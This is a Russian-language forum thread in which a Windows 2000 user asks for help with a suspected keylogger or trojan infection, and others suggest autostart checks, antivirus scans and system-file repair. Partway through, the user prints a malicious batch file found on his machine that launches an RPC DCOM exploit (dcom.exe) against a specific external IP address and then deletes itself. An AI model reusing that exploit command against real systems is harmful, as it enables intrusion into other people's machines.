Прога отыскивающая логеры

[Псих]

Ситуация какая...
Есть подозрения, что меня ломанули и подцепили на лог.
Как проверить стоит ли в системе какие-то проги-логи?
А еще глюк... Раньше все было гут, а с определенного времени фаервол начал блокировать ВСЕ протоколы.. Тоесть если стена включена, то ничего не грузится и не работает..
Есть какие-то идеи?

[FantomIL]

Какая операционка?
Какой файрволл?
В общем случае проверяем все места, откуда возможен автостарт и режем все, что нам незнакомо.
Для стенки - внимательно проверяем настройки и правила.
Также, проверяем систему на предмет вирусов и рекламно-шпионских модулей.

[Псих]

Система Win2k последние СП и заплатки.. Стена- VisNetic FireWall
Что странно появился в system32 файл sysconf.exe (регнулся в регах, стер я их потом)(удаление ничего не дало), с датой создания в день начала глюков. а еще непонятная мини дос атака с моего же айпишника...
хм.. звучит тупо
вообщем по 30 протоколов в секунду при условии , что ничего не работает. И все с моего айпишника, либо с айпи моего сервака.. по разным портам идут.

[mishgan2]

Ну а что говорят обычные антивирусы?

[Interceptor]

Псих
Почитай обзор прог для отлова кейлоггеров здесь: http://www1.xakep.ru/magazine/xa/060/042/1.asp

P.S. Не забудь: внизу страницы, что загрузится, есть ссылка - продолжение статьи

[Псих]

Цитата:

Сообщение от mishgan2

Ну а что говорят обычные антивирусы?

Антивирусы молчат!

[Псих]

Ща вот начало доходить кое-что...
Пару раз было, что svhost.exe уходил в даун. А это очень схоже на RPC DCOM
аля msblast.exe или его клоны... Но в системе бласта нет, я проверил.
Что теперь скажете?
Кстати после этого взял эксплойт по этой уязвимости и введя 127.0.0.1 "отимел" свою систему, хотя заплатка против этой дыры стоит. Кто че скажет и на это?

[Псих]

Свежие новости:
Натравил на свой винь прогу Стингер по отлову троев и оказалось, что в корне виня сидел dcom.trojan.exe (хотя антик его не находил).
Обрадовался, думал все, но оказалось не все.. тока вошел с той винды в сеть ,снова svhost.exe ушел в даун.. и все началось по новойй.... ((((

[Псих]

Вот что я нашел у себя в системе по адресу C:\Winodws

файл называется DCOM.Bat и является логическим продолжением прошлого поста. Листинг файла:
@echo off
cd C:\WINDOWS
cls
echo Dropping dcom.exe and cygwin1.dll...
echo Executing C:\WINDOWS\dcom.exe...
echo.
dcom.exe -d 195.5.8.76 -t 1 -r 0100139d -p 139 -l 3846
Echo.
pause
del C:\WINDOWS\DCOM.bat


=======
Помогите, что делать..

[gertako3]

Сноси его нафиг!!! или систему

[Псих]

Мне нужно знать.. это вирус или трой?

[Arc]

Привет, Псих. Ты не ответил ходишь ли ты на ВиндоузАпдейт. Если все заплатки точно установленны через Винапдейт т окакой у тебя Антивирь?
Один ибо другому рознь.

А вообще есть такая штука как SFC /SCANNOW

Проверь все системные файлы.

Ну и хорошо бы бекапиться впредь. Типа ERUNT. Каждый день при логоне бекап реестра. А раз в месяц системы NTbackup'ом.

Вот в принципе все ну еще есть список авторанов для прог. Ну это так...

[Interceptor]

Псих
Странно: ты установил заплатку, а она никакая? А ты уверен, что эта та самая заплатка? Может, другую качнул?
И ещё: ставь стенку. Давно бы пора её поставить

Цитата:

Мне нужно знать.. это вирус или трой?

А какая хрен разница? Одно могу сказать: файлы dcom.exe and cygwin1.dll - это файлы-сплоиты, юзающие эту самую дыру в винде

[Partyzan]

Псих
Вирус, трой - какая в принципе разница? Сноси все лишнее


Arc
Хороший подход, системный. Эх, раздолбаем себя таким почувствовал.. :-)